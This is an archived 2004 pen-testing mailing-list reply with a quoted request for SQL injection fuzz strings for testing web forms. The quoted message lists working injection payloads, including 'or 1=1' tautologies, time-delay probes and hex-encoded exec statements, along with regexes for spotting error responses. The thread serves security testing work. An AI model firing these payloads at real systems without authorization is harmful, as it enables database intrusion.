Re: SQL Injection Strings

From: wirepair (wirepair_at_roguemail.net)
Date: 06/28/04

Next message: Marcus: "Re: SQL Injection Strings"

Previous message: Imperva Application Defense Center: "Web App Vulnerabilities Statistical Analysis WP"
In reply to: Jeremy Junginger: "SQL Injection Strings"
Next in thread: Marcus: "Re: SQL Injection Strings"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: "Jeremy Junginger" <jj@act.com>, <pen-test@securityfocus.com>
Date: Mon, 28 Jun 2004 03:43:21 -0800

If you can read C you might wanna take a look at my broken and failed attempt SQLCrawl. Mine was
more of a crawl the entire db attempt. But hey it might give you some ideas:
http://sh0dan.org/files/sqlcrawl.tar
Hope this helps.

On Fri, 25 Jun 2004 08:01:39 -0700
"Jeremy Junginger" <jj@act.com> wrote:
>Good Morning,
>
>I'm customizing an http proxy that's feeding some POST parameters into web
>forms to test for SQL injections. I figured this would be the group to help
>put together a comprehensive list of "fuzz strings" to feed into the forms to
>test them. Here's what I have so far. I know it's far from complete.
>Please add any additional strings that you think may be helpful, or perhaps a
>link to an archived thread that has already discussed this?!?:
>
>'sqlvuln
>'+sqlvuln
>sqlvuln;
>(sqlvuln)
>a' or 1=1--
>a" or 1=1--
>a" or "a" = "a
>a' or 'a' = 'a
>1 or 1=1
>a' waitfor delay '0:0:10'--
>1 waitfor delay '0:0:10'--
>declare @q nvarchar (4000) select @q =
>0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0
>031003000270000
>declare @s varchar(22) select @s =
>0x77616974666F722064656C61792027303A303A31302700 exec(@s)
>declare @q nvarchar (4000) select @q =
>0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
>declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
>exec(@s)
>
>And if you're feeling even more generous, perhaps you have some suggestions
>on checking the response. I'm doing a regex search for the following to
>determine interesting strings. Of course I still have to take a look at some
>of the 200 responses to see if the waitfor and version commands worked :)
>
>HTTP/[0-9].[0-9] 500
>[Ee]rror
>(My)?SQL
>
>Thanks guys!
>
>-Jeremy
>

--
Visit Things From Another World for the best
comics, movies, toys, collectibles and more.
http://www.tfaw.com/?qt=wmf

Next message: Marcus: "Re: SQL Injection Strings"

Previous message: Imperva Application Defense Center: "Web App Vulnerabilities Statistical Analysis WP"
In reply to: Jeremy Junginger: "SQL Injection Strings"
Next in thread: Marcus: "Re: SQL Injection Strings"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Multiline Input in Perl
... I am trying to take Multi Line Input in PERL. ... I wanna take 3-4 strings from users, ...
(perl.beginners)
[CORBA, Visibroker, C++] Array, sequence problem.
... What I wanna do is get from server a set of strings (the number ... long get_clerks_list (out workerseq loginnames); ... Could anybody give me a simple example how to write a server function ...
(comp.lang.cpp)
Re: Reading comments in exe
... I will look into this for a littel bit more protection ... If you wanna be uber cautious, just "build" the strings in code... ...
(microsoft.public.vb.general.discussion)
Re: String->symbol in Lisp?
... tar@xxxxxxxxxxxxx (Thomas A. Russ) writes: ... but I don't know how to convert strings into symbols that are "normal". ... Wanna go outside. ...
(comp.lang.lisp)